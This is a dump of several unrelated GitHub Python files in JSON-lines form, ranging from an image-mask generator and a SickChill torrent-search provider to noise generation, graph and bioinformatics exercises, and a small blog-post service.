max_num_vertex = 8\r\n mean_angle = 2 * math.pi / 5\r\n angle_range = 2 * math.pi / 15\r\n min_width = 50\r\n max_width = 140\r\n\r\n average_radius = math.sqrt(H * H + W * W) / 8\r\n mask = Image.new('L', (W, H), 0)\r\n\r\n num_vertex = random.randint(min_num_vertex, max_num_vertex)\r\n angle_min = mean_angle - random.uniform(0, angle_range)\r\n angle_max = mean_angle + random.uniform(0, angle_range)\r\n angles = []\r\n vertex = []\r\n for i in range(num_vertex):\r\n if i % 2 == 0:\r\n angles.append(2 * math.pi - random.uniform(angle_min, angle_max))\r\n else:\r\n angles.append(random.uniform(angle_min, angle_max))\r\n\r\n h, w = mask.size\r\n vertex.append((int(random.randint(0, w)), int(random.randint(0, h))))\r\n for i in range(num_vertex):\r\n r = np.clip(\r\n np.random.normal(loc=average_radius, scale=average_radius // 2),\r\n 0, 2 * average_radius)\r\n new_x = np.clip(vertex[-1][0] + r * math.cos(angles[i]), 0, w)\r\n new_y = np.clip(vertex[-1][1] + r * math.sin(angles[i]), 0, h)\r\n vertex.append((int(new_x), int(new_y)))\r\n\r\n draw = ImageDraw.Draw(mask)\r\n width = int(random.uniform(min_width, max_width))\r\n draw.line(vertex, fill=1, width=width)\r\n for v in vertex:\r\n draw.ellipse((v[0] - width // 2,\r\n v[1] - width // 2,\r\n v[0] + width // 2,\r\n v[1] + width // 2),\r\n fill=1)\r\n\r\n if np.random.normal() > 0:\r\n mask.transpose(Image.FLIP_LEFT_RIGHT)\r\n if np.random.normal() > 0:\r\n mask.transpose(Image.FLIP_TOP_BOTTOM)\r\n \r\n mask = np.asarray(mask, np.float32)\r\n\r\n return mask\r\n\r\ndef get_mask_edge(mask):\r\n edge = cv2.Canny(mask, 0, 1)\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(20, 20))\r\n edge_mask = cv2.dilate(edge,kernel)\r\n \r\n return edge_mask","repo_name":"WuyangLuo/SPMPGAN","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"13089713048","text":"import re\nfrom urllib.parse import urljoin\n\nfrom sickchill import logger\nfrom sickchill.helper.common import convert_size\nfrom sickchill.oldbeard import helpers, tvcache\nfrom sickchill.oldbeard.bs4_parser import BS4Parser\nfrom sickchill.providers.torrent.TorrentProvider import TorrentProvider\n\n\nclass Provider(TorrentProvider):\n def __init__(self):\n super().__init__(\"Newpct\")\n\n self.onlyspasearch = None\n\n self.url = \"http://www.newpct.com\"\n self.urls = {\"search\": urljoin(self.url, \"index.php\")}\n\n self.cache = tvcache.TVCache(self, min_time=20)\n\n def search(self, search_strings, age=0, ep_obj=None):\n \"\"\"\n Search 
query:\n http://www.newpct.com/index.php?l=doSearch&q=fringe&category_=All&idioma_=1&bus_de_=All\n q => Show name\n category_ = Category 'Shows' (767)\n idioma_ = Language Spanish (1), All\n bus_de_ = Date from (All, mes, semana, ayer, hoy)\n \"\"\"\n results = []\n\n # Only search if user conditions are true\n lang_info = \"\" if not ep_obj or not ep_obj.show else ep_obj.show.lang\n\n search_params = {\"l\": \"doSearch\", \"q\": \"\", \"category_\": \"All\", \"idioma_\": 1, \"bus_de_\": \"All\"}\n\n for mode in search_strings:\n items = []\n logger.debug(_(\"Search Mode: {mode}\").format(mode=mode))\n\n if self.onlyspasearch:\n search_params[\"idioma_\"] = 1\n else:\n search_params[\"idioma_\"] = \"All\"\n\n # Only search if user conditions are true\n if self.onlyspasearch and lang_info != \"es\" and mode != \"RSS\":\n logger.debug(\"Show info is not spanish, skipping provider search\")\n continue\n\n search_params[\"bus_de_\"] = \"All\" if mode != \"RSS\" else \"semana\"\n\n for search_string in {*search_strings[mode]}:\n if mode != \"RSS\":\n logger.debug(_(\"Search String: {search_string}\").format(search_string=search_string))\n\n search_params[\"q\"] = search_string\n\n data = self.get_url(self.urls[\"search\"], params=search_params, returns=\"text\")\n if not data:\n continue\n\n with BS4Parser(data) as html:\n torrent_table = html.find(\"table\", id=\"categoryTable\")\n torrent_rows = torrent_table(\"tr\") if torrent_table else []\n\n # Continue only if at least one Release is found\n if len(torrent_rows) < 3: # Headers + 1 Torrent + Pagination\n logger.debug(\"Data returned from provider does not contain any torrents\")\n continue\n\n # 'Fecha', 'Título', 'Tamaño', ''\n # Date, Title, Size\n labels = [label.get_text(strip=True) for label in torrent_rows[0](\"th\")]\n for row in torrent_rows[1:-1]:\n try:\n cells = row(\"td\")\n\n torrent_row = row.find(\"a\")\n download_url = torrent_row.get(\"href\", \"\")\n title = self._processTitle(torrent_row.get(\"title\", \"\"), download_url)\n if not all([title, download_url]):\n continue\n\n # Provider does not provide seeders/leechers\n seeders = 1\n leechers = 0\n # 2 is the 'Tamaño' column.\n torrent_size = cells[2].get_text(strip=True)\n\n size = convert_size(torrent_size) or -1\n item = {\"title\": title, \"link\": download_url, \"size\": size, \"seeders\": seeders, \"leechers\": leechers, \"hash\": \"\"}\n if mode != \"RSS\":\n logger.debug(_(\"Found result: \") + f\"{title}\")\n\n items.append(item)\n except (AttributeError, TypeError):\n continue\n\n results += items\n\n return results\n\n def get_url(self, url, post_data=None, params=None, timeout=30, **kwargs):\n \"\"\"\n returns='content' when trying access to torrent info (For calling torrent client). 
Previously we must parse\n the URL to get torrent file\n \"\"\"\n trickery = kwargs.pop(\"returns\", \"\")\n if trickery == \"content\":\n kwargs[\"returns\"] = \"text\"\n data = super().get_url(url, post_data=post_data, params=params, timeout=timeout, **kwargs)\n url = re.search(r\"http://tumejorserie.com/descargar/.+\\.torrent\", data, re.DOTALL).group()\n url = urljoin(self.url, url.rsplit(\"=\", 1)[-1])\n\n kwargs[\"returns\"] = trickery\n return super().get_url(url, post_data=post_data, params=params, timeout=timeout, **kwargs)\n\n def download_result(self, result):\n \"\"\"\n Save the result to disk.\n \"\"\"\n\n # check for auth\n if not self.login():\n return False\n\n urls, filename = self._make_url(result)\n\n for url in urls:\n # Search results don't return torrent files directly, it returns show sheets so we must parse showSheet to access torrent.\n data = self.get_url(url, returns=\"text\")\n url_torrent = re.search(r\"http://tumejorserie.com/descargar/.+\\.torrent\", data, re.DOTALL).group()\n\n if url_torrent.startswith(\"http\"):\n self.headers.update({\"Referer\": \"/\".join(url_torrent.split(\"/\")[:3]) + \"/\"})\n\n logger.info(\"Downloading a result from {0}\".format(url))\n\n if helpers.download_file(url_torrent, filename, session=self.session, headers=self.headers):\n if self._verify_download(filename):\n logger.info(\"Saved result to {0}\".format(filename))\n return True\n else:\n logger.warning(\"Could not download {0}\".format(url))\n helpers.remove_file_failed(filename)\n\n if urls:\n logger.warning(\"Failed to download any results\")\n\n return False\n\n @staticmethod\n def _processTitle(title, url):\n # Remove 'Mas informacion sobre ' literal from title\n title = title[22:]\n title = re.sub(r\"[ ]{2,}\", \" \", title, flags=re.I)\n\n # Quality - Use re module to avoid case sensitive problems with replace\n title = re.sub(r\"\\[HDTV 1080p?[^\\[]*]\", \"1080p HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[HDTV 720p?[^\\[]*]\", \"720p HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[ALTA DEFINICION 720p?[^\\[]*]\", \"720p HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[HDTV]\", \"HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[DVD[^\\[]*]\", \"DVDrip x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay 1080p?[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay Rip 1080p?[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay Rip 720p?[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay MicroHD[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[MicroHD 1080p?[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BLuRay[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BRrip[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BDrip[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n\n # detect hdtv/bluray by url\n # hdtv 1080p example url: http://www.newpct.com/descargar-seriehd/foo/capitulo-610/hdtv-1080p-ac3-5-1/\n # hdtv 720p example url: http://www.newpct.com/descargar-seriehd/foo/capitulo-26/hdtv-720p-ac3-5-1/\n # hdtv example url: http://www.newpct.com/descargar-serie/foo/capitulo-214/hdtv/\n # bluray compilation example url: http://www.newpct.com/descargar-seriehd/foo/capitulo-11/bluray-1080p/\n title_hdtv = re.search(r\"HDTV\", title, flags=re.I)\n title_720p = re.search(r\"720p\", title, flags=re.I)\n title_1080p = re.search(r\"1080p\", title, 
flags=re.I)\n title_x264 = re.search(r\"x264\", title, flags=re.I)\n title_bluray = re.search(r\"bluray\", title, flags=re.I)\n title_serie_hd = re.search(r\"descargar-seriehd\", title, flags=re.I)\n url_hdtv = re.search(r\"HDTV\", url, flags=re.I)\n url_720p = re.search(r\"720p\", url, flags=re.I)\n url_1080p = re.search(r\"1080p\", url, flags=re.I)\n url_bluray = re.search(r\"bluray\", url, flags=re.I)\n\n if not title_hdtv and url_hdtv:\n title += \" HDTV\"\n if not title_x264:\n title += \" x264\"\n if not title_bluray and url_bluray:\n title += \" BluRay\"\n if not title_x264:\n title += \" x264\"\n if not title_1080p and url_1080p:\n title += \" 1080p\"\n title_1080p = True\n if not title_720p and url_720p:\n title += \" 720p\"\n title_720p = True\n if not (title_720p or title_1080p) and title_serie_hd:\n title += \" 720p\"\n\n # Language\n title = re.sub(r\"\\[Spanish[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n title = re.sub(r\"\\[Castellano[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n title = re.sub(r\"\\[Español[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n title = re.sub(r\"\\[AC3 5\\.1 Español[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n\n if re.search(r\"\\[V.O.[^\\[]*]\", title, flags=re.I):\n title += \"-NEWPCTVO\"\n else:\n title += \"-NEWPCT\"\n\n return title.strip()\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/providers/newpct.py","file_name":"newpct.py","file_ext":"py","file_size_in_byte":9752,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"34885196038","text":"from enum import Enum\nfrom math import prod\nimport numpy as np\n\nfrom pyambient.src import cppyy\n\n# _perlin_2d = cppyy.gbl.perlin_2d_c\n# _perlin_3d = cppyy.gbl.perlin_3d_c\n# _simplex_2d = cppyy.gbl.simplex_2d_c\n# _simplex_3d = cppyy.gbl.simplex_3d_c\n# _simplex_4d = cppyy.gbl.simplex_4d_c\n_noise_2d = cppyy.gbl.noise_2d_c\n_noise_3d = cppyy.gbl.noise_3d_c\n\n\nclass NoiseType(Enum):\n open_simplex2 = 0\n open_simplex2S = 1\n cellular = 2\n perlin = 3\n value_cubic = 4\n value = 5\n white = 6\n\n\nclass FractalType(Enum):\n none = 0\n fbm = 1\n ridged = 2\n pingpong = 3\n domain_warp_progressive = 4\n domain_warp_independent = 5\n\n\nclass RotationType3D(Enum):\n none = 0\n improve_xy_planes = 1\n improve_xz_planes = 2\n\n\nclass CellularDistanceFunction(Enum):\n euclidean = 0\n euclidean_square = 1\n manhattan = 2\n hybrid = 3\n\n\nclass CellularReturnType(Enum):\n cell_value = 0\n distance = 1\n distance2 = 2\n distance2_add = 3\n distance2_sub = 4\n distance2_mul = 5\n distance2_div = 6\n\n\nclass DomainWarpType(Enum):\n open_simplex2 = 0\n open_simplex2_reduced = 1\n basic_grid = 2\n\n\ndef generate_noise_arr(dimensions: tuple, noise_type='perlin', frequency: float = 0.01,\n fractal='fbm', octaves: int = 3, lacunarity: int = 2,\n gain: float = 0.5, cellular_distance_fn=-1, cellular_return_type=0,\n domain_warp_type=0, jitter=0,\n perturb=0, domain_warp_amp=1, seed: int = None):\n fractal_type = FractalType[fractal].value\n noise_type = NoiseType[noise_type].value\n common_args = dict(\n noise_type=noise_type,\n seed=np.random.randint(0, 1000) if not seed else seed,\n freq=frequency,\n fractal=fractal_type,\n octaves=octaves,\n lacunarity=lacunarity,\n gain=gain,\n perturb=perturb,\n domain_warp_amp=domain_warp_amp,\n cellular_distance=cellular_distance_fn,\n cellular_return_val=cellular_return_type, jitter=jitter\n )\n if len(dimensions) == 2:\n noise = _noise_2d(\n height=dimensions[0],\n 
width=dimensions[1],\n **common_args)\n\n elif len(dimensions) == 3:\n noise = _noise_3d(\n height=dimensions[0],\n width=dimensions[1],\n depth=dimensions[2],\n **common_args)\n\n else:\n raise Exception(\"number of dimensions not supported\")\n\n noise_np = np.frombuffer(noise, dtype=np.float32, count=prod(dimensions))\n return noise_np.reshape(dimensions)\n\n","repo_name":"wwymak/pyambient","sub_path":"pyambient/py/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71637559466","text":"\n\"\"\"Code Challenge: Solve the Eulerian Path Problem.\n Input: The adjacency list of a directed graph that has an Eulerian path.\n Output: An Eulerian path in this graph.\n\"\"\"\n\n#I'm just going to re-use here the function eulerianCycle that I coded before.\ndef eulerianCycle(graph):\n edges = {}\n for i in range (len(graph)):\n edges[i] = len(graph[i])\n cycle = []\n tempCycle = []\n node = 0\n tempCycle.append(0)\n while len(tempCycle):\n if edges[node]:\n tempCycle.append(node)\n nextNode = graph[node][-1]\n edges[node] -= 1\n graph[node].pop()\n node = nextNode\n else:\n cycle.append(node)\n node = tempCycle[-1]\n tempCycle.pop()\n\n eularian = []\n for i in range(len(cycle) - 1, -1, -1):\n eularian.append(cycle[i])\n return eularian\n\n\n#Here is our main function.\ndef eulerianPath(adjacency):\n #First of all, we need to identify the unbalanced nodes.\n outdegree = {}\n indegree = {}\n\n #Let's add the number of edges each by counting the indegree and the outdegree of each node.\n #First, let's add the outdegree in the edges list.\n for i in range (len(adjacency)):\n outdegree[i] = len(adjacency[i])\n print(outdegree)\n\n #For the indegree, lets transform the list of list into a single list of elements\n temporary = []\n for sublist in adjacency:\n for item in sublist:\n temporary.append(item)\n \n print(temporary)\n\n #Now that we have a simple list with just the different nodes that are reached by an edge,\n #we can simply count the occurences of each node in the temporary list. \n #Thanks to that, we will finally have the indegree dico complete\n for i in range (len(temporary)):\n indegree[i] = temporary.count(i)\n \n print(indegree)\n\n #This is now awesome, we have all our degrees calculated. We now need to compare these two\n #dictionnarys to find the nodes that are unbalanced. After that, we'll create a connection between those two.\n problematicNodes = [node for node in outdegree if node in indegree and outdegree[node] != indegree[node]]\n print(\"Here are our two problematic values\")\n print(problematicNodes)\n\n #The principle will now to connect those two nodes to make an eulerian cycle\n for node in problematicNodes:\n print(node)\n print(outdegree[node])\n print(indegree[node])\n if outdegree[node] < indegree[node]:\n outdegree[node] = outdegree[node] + 1\n else:\n indegree[node] = indegree[node] + 1\n \n print(node)\n #+We have of course to modify the adjacency itself. 
\n        if node == problematicNodes[0]:\n            adjacency[problematicNodes[0]].append(problematicNodes[1])\n    \n    \n    print(\"Here is the eulerian cycle with the indegree and outdegree that are similar\")\n    print(indegree)\n    print(outdegree)\n    print(adjacency)\n\n    #Now, we can finally calculate an eulerian cycle with the function I coded before\n    cycle = eulerianCycle(adjacency)\n    print(cycle)\n    \n    #Finally, we simply need to put them in the right order to be a path and not a cycle\n    #For that, we need to cut in the right place\n    answer = []\n    for i in range (len(cycle)):\n        if cycle[i] == problematicNodes[1] and cycle[i - 1] == problematicNodes[0]:\n            answer.append(cycle[i])\n    for i in range(cycle[problematicNodes[1]] - 1, len(cycle)):\n        answer.append(cycle[i])\n    \n    for i in range(1, cycle[problematicNodes[0]] + 1):\n        answer.append(cycle[i])\n    \n    #Let's print the final answer\n    for i in range (len(answer)):\n        print(answer[i], end = \"\")\n        print(\" -> \", end = \"\")\n    return answer\n    \n\n\n#Random test\n#print(eulerianPath([[2], [3], [1], [0, 4], [], [], [3, 7], [8], [9], [6]]))\nprint(eulerianPath([[5], [6], [1], [4], [0], [2], []]))","repo_name":"carbonnm/MOOC-Bioinformatics","sub_path":"code/Week2/eulerianPathProblem.py","file_name":"eulerianPathProblem.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"5561554297","text":"def sym_2_arrays(arg1, arg2):\n    unique = set(arg1 + arg2)\n    result = []\n    for check in unique:\n        if ((check in arg1) and (check in arg2)):\n            continue\n        else: result.append(check)\n    return result\n\ndef sym(*arg):\n    result = sym_2_arrays(arg[0], arg[1])\n    for i in range(2, len(arg)):\n        result = sym_2_arrays(result, arg[i])\n    print(result)\n\nsym([3, 3, 3, 2, 5], [2, 1, 5, 7], [3, 4, 6, 6], [1, 2, 3], [5, 3, 9, 8], [1])","repo_name":"themeowsketeer/Python-Playground","sub_path":"interview_questions/SymmetricDifference.py","file_name":"SymmetricDifference.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"14935340970","text":"# Maze search\nfrom collections import deque\n\ndef bfs(x, y):\n    # up, right, down, left\n    dx = [-1, 0, 1, 0]\n    dy = [0, 1, 0, -1]\n    \n    queue = deque()\n    queue.append((x, y))\n    \n    while(queue):\n        x, y = queue.popleft()\n        \n        for i in range(4):\n            nx = x + dx[i]\n            ny = y + dy[i]\n            # case: we stepped outside the grid\n            if nx < 0 or nx >= n or ny < 0 or ny >= m :\n                continue\n            # case: the cell cannot be entered\n            elif graph[nx][ny] == 0:\n                continue\n            # case: the cell can be entered\n            if graph[nx][ny] == 1:\n                # graph[nx][ny] = 0\n                graph[nx][ny] = graph[x][y] + 1\n                queue.append((nx,ny))\n    return graph[n-1][m-1]\n\nn, m = map(int, input().split())\ngraph =[]\n\nfor i in range(n):\n    graph.append(list(map(int, input())))\n\nprint(bfs(0,0))\n    ","repo_name":"tjrdnjs67/Algorithm_Study","sub_path":"hyeonji/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9577858796","text":"import argparse\n\nFILENAME = 'bakery.csv'\nENCODING = 'utf-8'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('sum', type=str, help='Sum')\nargs = parser.parse_args()\n\nwith open(FILENAME, 'a', encoding=ENCODING) as f:\n    f.write(args.sum + 
'\n')\n","repo_name":"demade74/de_course","sub_path":"q1/python/Kulushev_Konstantin_dz_6/task_7/add_sale.py","file_name":"add_sale.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"11072148482","text":"def Pr(Text, Profile):\n\t# Probability of Text under Profile (one list of ACGT probabilities per position).\n\tp = 1.0\n\tfor i in range(len(Text)):\n\t\tp *= Profile[i]['ACGT'.index(Text[i])]\n\treturn p\n\n\ndef ProfileMostProbablePattern(Text, k, Profile):\n    # Uses Pr(Text, Profile) as a subroutine.\n\tmatchmax=-1\n\tProbablePattern=\"\"\n\tfor i in range(len(Text)-k+1):\n\t\tPattern = Text[i:i+k]\n\t\tif Pr(Pattern, Profile) > matchmax:\n\t\t\tmatchmax=Pr(Pattern, Profile)\n\t\t\tProbablePattern=Pattern \n \n\treturn ProbablePattern\n\n\ndef score(motifs):\n    '''Returns the score of the given list of motifs.'''\n    columns = [''.join(seq) for seq in zip(*motifs)]\n    max_count = sum([max([c.count(nucleotide) for nucleotide in 'ACGT']) for c in columns])\n    return len(motifs[0])*len(motifs) - max_count\n\n\ndef profile(motifs):\n    '''Returns the profile of the dna list motifs.'''\n    columns = [''.join(seq) for seq in zip(*motifs)]\n    return [[float(col.count(nuc)) / float(len(col)) for nuc in 'ACGT'] for col in columns]\n\n\ndef greedy_motif_search(dna_list, k, t):\n    '''Runs the Greedy Motif Search algorithm and returns the best motif.'''\n    # Initialize the best score as a score higher than the highest possible score.\n    best_score = t*k\n\n    # Run the greedy motif search.\n    for i in range(len(dna_list[0])-k+1):\n        # Initialize the motifs as each k-mer from the first dna sequence.\n        motifs = [dna_list[0][i:i+k]]\n\n        # Find the most probable k-mer in the next string.\n        for j in range(1, t):\n            current_profile = profile(motifs)\n            motifs.append(ProfileMostProbablePattern(dna_list[j], k, current_profile))\n\n        # Check to see if we have a new best scoring list of motifs.\n        current_score = score(motifs)\n        if current_score < best_score:\n            best_score = current_score\n            best_motifs = motifs\n\n    return best_motifs\n\n\ndef main():\n
    '''Main call. Reads, runs, and saves problem specific data.'''\n    # Read the input data.\n    with open('dataset.txt') as input_data:\n        k, t = map(int, input_data.readline().split())\n        dna_list = [line.strip() for line in input_data]\n\n    # Run the Greedy Motif Search.\n    best_motifs = greedy_motif_search(dna_list, k, t)\n    for word in best_motifs:\n        print (word)\n    \n\n    # Print and save the answer.\n    #print (best_motifs)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mars1198/bioinformatics","sub_path":"greedy_motif_search.py","file_name":"greedy_motif_search.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"4368170927","text":"from typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n    def permute(self, nums: List[int]) -> List[List[int]]:\n\n        def backTracking(nums: List[int], res: List[List[int]], path: List[int], used: List[bool]):\n            if len(path) == len(nums):\n                res.append(list(path))\n                return\n            for i in range(len(nums)):\n                if used[i]:\n                    continue\n                used[i] = True\n                path.append(nums[i])\n                backTracking(nums, res, path, used)\n                path.pop()\n                used[i] = False\n\n        used = [False] * len(nums)\n        res = []\n        backTracking(nums, res, [], used)\n        return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\ns = Solution()\nprint(s.permute([1, 2, 3]))\n","repo_name":"Howloong/Leetcode","sub_path":"python/leetcode/editor/cn/P46_Permutations.py","file_name":"P46_Permutations.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"98831577","text":"\"\"\"\nHOW ARE TESTS DIFFERENT FROM ORDINARY PYTHON CODE?\nA TEST IS THE SAME KIND OF CODE THAT DESCRIBES A SEQUENCE OF ACTIONS,\nBUT TESTS MUST CONTAIN CHECKS COMPARING THE EXPECTED RESULT\nWITH THE ACTUAL RESULT\n\"\"\"\n\n\nclass TestExample:\n    def test_check_math(self):\n        d = 5\n        b = 9\n        expected_some = 14\n        assert d + b == expected_some, f\"Sum of {d} plus {b} is not equal to {expected_some}\"\n\n    def test_check_math2(self):\n        d = 5\n        b = 3\n        expected_some = 14\n        assert d + b == expected_some, f\"Sum of {d} plus {b} is not equal to {expected_some}\"\n\n\n\n","repo_name":"shnopiqa/AutotestAPI","sub_path":"pytest+API/test_First_pytest.py","file_name":"test_First_pytest.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"36774797204","text":"def run():\n    print('class 11: high order functions (part 2)')\n\n    # from a list of numbers, print the odd numbers, using 'list comprehensions'\n    my_list = [1, 4, 5, 6, 9, 13, 19, 21]\n    odd = [i for i in my_list if i % 2 != 0]\n    print(odd)\n\n    # from a list of numbers, print the odd numbers, using the \"filter\" function\n    # filter(function, iterable)\n    odd2 = list(filter(lambda x: x % 2 != 0, my_list))\n    print(odd2)\n\nif __name__ == '__main__':\n    run()\n","repo_name":"luis2ra/py3-03-platzi-curso-intermedio","sub_path":"11_high_order_functions_part2.py","file_name":"11_high_order_functions_part2.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40407359850","text":"from basekit_core_lib.api.services.base_service import BaseService\nfrom basekit_api_template.api.blog.models.post import Post\n
from basekit_api_template.api.blog.schemas import PostSchema\nfrom basekit_core_lib.config.helpers import db\n\nclass PostService(BaseService):\n    def __init__(self) -> None:\n        super().__init__(Post, PostSchema())\n    \n    def get_all(self):\n        try:\n            models = self._get_all() \n            model_data = self.model_schema.dump(models, many=True)\n            return model_data\n        except Exception as e:\n            db.session.rollback() # Roll back to revert the transaction\n            raise Exception(f\"Erro ao obter todas os aplicações: {e}\")\n\n    def get_by_id(self, id):\n        try:\n            model = self._get_by_id(id)\n            if model:\n                model_data = self.model_schema.dump(model)\n                return model_data\n            return None\n        except Exception as e:\n            db.session.rollback() # Roll back to revert the transaction\n            raise Exception(f\"Erro ao obter post por ID {id}: {e}\")\n    \n    def create(self, model_data):\n        try:\n            self.is_valid(self.model_schema, model_data) # Validate the schema before creating the post\n            \n            model_data.pop('roles', []) # Extract the role information\n            model = self._create(model_data)\n            model_data = self.model_schema.dump(model)\n            return model_data\n        except Exception as e:\n            db.session.rollback() # Roll back to revert the transaction\n            raise Exception(f\"Erro ao criar aplicações: {e}\")\n    \n    def update(self, id, model_data):\n        try: \n            model_data.pop('roles', []) # Extract the role information \n            self.is_valid(self.model_schema, model_data) # Validate the schema before updating the post\n            model = Post.query.get(id)\n            if model:\n                self._update(model, model_data, self.model_schema)\n                model_data = self.model_schema.dump(model)\n                return model_data\n            return None\n        except Exception as e:\n            db.session.rollback() # Roll back to revert the transaction\n            raise Exception(f\"Erro ao atualizar post com ID {id}: {e}\")\n\n    def delete(self, id):\n        try:\n            return self._delete(id)\n        except Exception as e:\n            db.session.rollback() # Roll back to revert the transaction\n            raise Exception(f\"Erro ao excluir post com ID {id}: {e}\")\n    \n","repo_name":"marcorsouza/basekit-api-template","sub_path":"basekit_api_template/api/blog/services/post_service.py","file_name":"post_service.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40021810220","text":"\npriceadult=200\npricechild=100\n\nprint('成人票价为:',priceadult,'小孩票价为:',pricechild)\nadult=int(input('成人人数'))\nchild=int(input('小孩人数'))\ntotal=adult*priceadult + child*pricechild\n'''\nif total>0 and total<200:\n    discount=1\nelse:\n    if total>=200 and total<500:\n        discount=0.95\n    else:\n        if total>=500 and total<1000:\n            discount=0.9\n        else:\n            discount=0.8\n'''\nif total>0 and total<200:\n    discount=1\nelif total>=200 and total<500:\n    discount=0.95\nelif total>=500 and total<1000:\n    discount=0.9\nelse:\n    discount=0.8\n\nprint('原付:%d,应付:%.2f' % (total,total*discount))\n","repo_name":"zhangzhonghua1999/webapp","sub_path":"hua/myproject/weixistyle/5.1 条件语句.py","file_name":"5.1 条件语句.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71609080106","text":"import subprocess\nfrom config import STEPS\nfrom execute_steps import run_steps\n\nSEPERATE_LINE = \"=\" * 55\n\n\ndef main():\n    # Start \n    print(\"Available step names:\")\n    for name in STEPS:\n        print(name)\n    print(SEPERATE_LINE)\n    print(\"Just press enter to run all steps.\")\n    print(SEPERATE_LINE)\n\n    # Set steps\n    step_input = input(
\"Enter the step names to execute (comma-separated): \")\n    print(SEPERATE_LINE)\n    if not step_input:\n        step_names = STEPS\n    else:\n        step_names = [step.strip() for step in step_input.split(\",\")]\n        print(\"Selected steps to execute:\")\n        for name in step_names:\n            print(name)\n\n    # Run steps\n    subprocess.run([\"python\", \"execute_steps.py\"] + step_names)\n    run_steps(step_names)\n\n    # Finish\n    print(\"Process Done.\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"dsdanielpark/open-llm-leaderboard-report","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"37"}
+{"seq_id":"13675761760","text":"import random\nfrom collections import deque\n\nl = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nl = deque(l)\n\nfor i in range(int(random.random() * 10000000 // 1000)):\n    r = random.randint(1, 3)\n    if r == 1:\n        l.appendleft(l.pop())\n    if r == 2:\n        l.append(l.popleft())\n    if r == 3:\n        l.reverse()\n    print(r, l)","repo_name":"kaki1013/AtCoder","sub_path":"AtCoder Regular Contest/132/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30988421529","text":"def is_prime(n):\r\n    if n == 2 or n == 3:\r\n        return True\r\n\r\n    if n <= 1 or n % 2 == 0:\r\n        return False\r\n\r\n    for i in range(3, n, 2):\r\n        if n % i == 0:\r\n            return False\r\n    return True\r\n\r\n\r\nwith open('liczby.txt', 'r') as file:\r\n    for line in file:\r\n        liczba = int(line.strip())\r\n        odbicie = int(line.strip()[::-1])\r\n\r\n        if is_prime(liczba) and is_prime(odbicie):\r\n            print(liczba)\r\n","repo_name":"igorjakus/matura2023-informatyka","sub_path":"2022-czerwiec/4_3.py","file_name":"4_3.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
